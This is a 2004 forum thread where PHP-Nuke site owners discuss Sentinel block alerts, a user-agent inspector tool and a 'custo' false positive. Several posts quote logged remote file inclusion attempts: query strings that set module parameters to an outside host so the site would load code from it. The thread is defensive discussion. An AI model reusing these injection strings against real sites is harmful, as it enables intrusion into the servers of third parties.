Author |
Message |
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Fri Jun 25, 2004 7:42 am |
|
Sentinel traps various harvesters by examining the browser agent that is being used/forged. The list of harvesters is available and maintainable through the Sentinel™ administration panel. It is not always readily apparent why a particular agent gets flagged. There is now a module called Agent Inspector under my Site Navigation menu. Whenever you need an explanation as to what harvester entry trapped the agent that is in the email that Sentinel™ sent you, just use this utility.
Let me know if you find bugs or think it needs enhancing. |
|
|
|
|
Salieri
Hangin' Around
Joined: Nov 07, 2003
Posts: 33
|
Posted:
Fri Jun 25, 2004 8:36 am |
|
Has this feature been implemented in the Sentinal packages?
Sounds great. |
|
|
|
|
Raven
|
Posted:
Fri Jun 25, 2004 8:40 am |
|
In the next release (v2.0) the Agent that trapped it will be included in the Email. |
|
|
|
|
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
|
Posted:
Fri Jun 25, 2004 9:04 am |
|
Sentinel 2.0 is looking extremely awesome.
"There is no obvious match for ==> an obvious match.
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums." |
_________________ Captain of the Internet Debate Team. |
|
|
|
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
Posted:
Fri Jun 25, 2004 9:55 pm |
|
Received this notification and no obvious conclusion was provided by the new Explainer:
Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String: alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/&cat=http://217.59.104.226/&pos=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET |
|
|
|
|
xfsunolesphp
Regular
Joined: Aug 23, 2003
Posts: 77
|
Posted:
Fri Jun 25, 2004 10:07 pm |
|
it appear, it trying to hack your site in bad way. |
|
|
|
|
sharlein
Member Emeritus
Joined: Nov 19, 2002
Posts: 322
Location: On the Road
|
Posted:
Fri Jun 25, 2004 10:11 pm |
|
Would this be considered a False Positive (using Agent Inspector):Code:Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo
| Thanks, Steve |
_________________ Give Me Ambiguity Or Give Me Something Else! |
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
|
Posted:
Fri Jun 25, 2004 10:17 pm |
|
Yep would be best to remove custo from the list until we can figure out a way to catch it without killing of every user agent with customer or custom in it. |
_________________ [b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 |
|
|
|
sharlein
|
Posted:
Fri Jun 25, 2004 10:30 pm |
|
|
|
|
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)
|
Posted:
Fri Jun 25, 2004 10:31 pm |
|
The email above shows that there was a trip in the "Filter" blocker. This is done when someone tries to pass [ Only registered users can see links on this board! Get registered or login! ] thru the name variable. Had it not been tripped by a true hack it would have been tripped by the "libcurl" harvester list string match. |
_________________ Bob Marion
Codito Ergo Sum
http://www.nukescripts.net |
|
|
|
sharlein
|
Posted:
Fri Jun 25, 2004 10:55 pm |
|
That IP listed above appears to be trying to hack a lot of Nuke sites. They tried mine, but Sentinel caught them. Excellent work! Thank you |
|
|
|
|
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
Posted:
Sat Jun 26, 2004 4:30 am |
|
Offtopic..same ip here...Sentinel saved my website!
Ontopic: Thx Raven for your agent inspector..its great and easy to use.
Cant wait for 2.0. |
|
|
|
|
GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
|
Posted:
Sat Jun 26, 2004 8:35 am |
|
I got some "abuse" blocked yesterday, same IP again.
Code:
modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&sid=http://217.59.104.226/
|
We must all have places in some script kiddies little black book. |
_________________
Need a quality custom theme designed? PM me! |
|
|
|
bretonmage
Hangin' Around
Joined: Mar 30, 2004
Posts: 34
|
Posted:
Sat Jun 26, 2004 9:29 am |
|
Yep, even I've got the same hack attempt:
Code:modules.php?name=http://217.59.104.226/&page=http://217.59.104.226/
modules.php?name=http://217.59.104.226/&pa=http://217.59.104.226/&pid=http://217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&p=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&meta=http%3A//217.59.104.226/&cat=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&album=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
|
All in all, I have around 20 of the same hack attempt with that IP. |
|
|
|
|
SmackDaddy
Involved
Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH
|
Posted:
Sun Jun 27, 2004 11:42 pm |
|
Raven wrote: | In the next release (v2.0) the Agent that trapped it will be included in the Email. |
So with this being the case, what you are saying is that your Agent Inspector won't be a block you'll need to be releasing, correct?
And I see according to Bob's site, that 2.0 is *TENTATIVELY* due out in a week or so (July 4th-ish).....so that's good! Thanks for the dedication and efforts of the Sentinel Crew! |
|
|
|
|
Raven
|
Posted:
Mon Jun 28, 2004 4:02 am |
|
That is correct. In v2.0 you should see the Reason more clearly defined in the Admin email. |
|
|
|
|
ConViCT
New Member
Joined: Oct 18, 2002
Posts: 21
|
Posted:
Wed Jul 07, 2004 1:30 pm |
|
I am getting a different Agent -Abuse email, here is where it is pointing to:
mydomain.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0
It is blocking people, but the utility doesn't explain why....
Any ideas?
Thanks,
ConViCt
EDIT NOTE: I use the same string and do not get banned, but poeple outside are? |
|
|
|
|
Raven
|
Posted:
Wed Jul 07, 2004 1:41 pm |
|
Please post the actual top content of your email but just mask your domain, like thisCode:Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Agent
--------------------
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer)
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET
|
|
|
|
|
|
ConViCT
|
Posted:
Wed Jul 07, 2004 1:45 pm |
|
Doh! Sorry about that, here it is:
Date & Time: 2004-07-07 12:11:46
Blocked IP: 68.13.204.14
User ID: Anonymous (1)
Reason: Abuse - AGENT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Forwarded For: none
Client IP: none
Remote Address: 68.13.204.14
Remote Port: 1831
Request Method: GET
--------------------
Who-Is for IP
OrgName: Cox Communications Inc.
OrgID: CXA
Address: 1400 Lake Hearn Drive
City: Atlanta
StateProv: GA
PostalCode: 30319
Country: US
NetRange: 68.0.0.0 - 68.15.255.255
CIDR: 68.0.0.0/12
NetName: COX-ATLANTA
NetHandle: NET-68-0-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: NS.COX.NET
NameServer: NS.WEST.COX.NET
NameServer: NS.EAST.COX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-12
Updated: 2002-08-21
TechHandle: IC146-ARIN
TechName: Cox Communications, Inc
TechPhone: +1-404-269-7626
TechEmail: [ Only registered users can see links on this board! Get registered or login! ]
OrgAbuseHandle: IC146-ARIN
OrgAbuseName: Cox Communications, Inc
OrgAbusePhone: +1-404-269-7626
OrgAbuseEmail: [ Only registered users can see links on this board! Get registered or login! ]
OrgTechHandle: WILLI-ARIN
OrgTechName: Williams, Matt
OrgTechPhone: +1-404-269-7626
OrgTechEmail: [ Only registered users can see links on this board! Get registered or login! ]
Thanks,
ConViCt |
|
|
|
|
Raven
|
Posted:
Wed Jul 07, 2004 2:01 pm |
|
Try using the Agent Inspector on that Agent string. That will tell you why |
|
|
|
|
ConViCT
|
Posted:
Wed Jul 07, 2004 2:11 pm |
|
hmmmm, I must be doing something wrong then, as I post it in the Agent Inspector and get this:
There is no obvious match for ==> [ Only registered users can see links on this board! Get registered or login! ]
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums.
I tried placing the [ Only registered users can see links on this board! Get registered or login! ] before it also but it gave me the same error.....
What am I dong wrong?
Thanks,
ConViCt |
|
|
|
|
Raven
|
Posted:
Wed Jul 07, 2004 2:20 pm |
|
No, the USER AGENT string
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) |
|
|
|
|
ConViCT
|
Posted:
Wed Jul 07, 2004 2:26 pm |
|
Ahhhhhhhh!
Thanks Raven!
But what does:Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo mean?
custo?
Huh?
Thanks so much for your help! |
|
|
|
|
ConViCT
|
Posted:
Wed Jul 07, 2004 2:28 pm |
|
Something else I just noticed....every single block by Sentinel has come from Cox.net... |
|
|
|
|
ConViCT
|
Posted:
Wed Jul 07, 2004 2:34 pm |
|
Never mind figured it out! Noticed in another post that Custo shoud be removed from the harvester list!
Thanks so much Raven, You Rock!
ConViCt |
|
|
|
|
|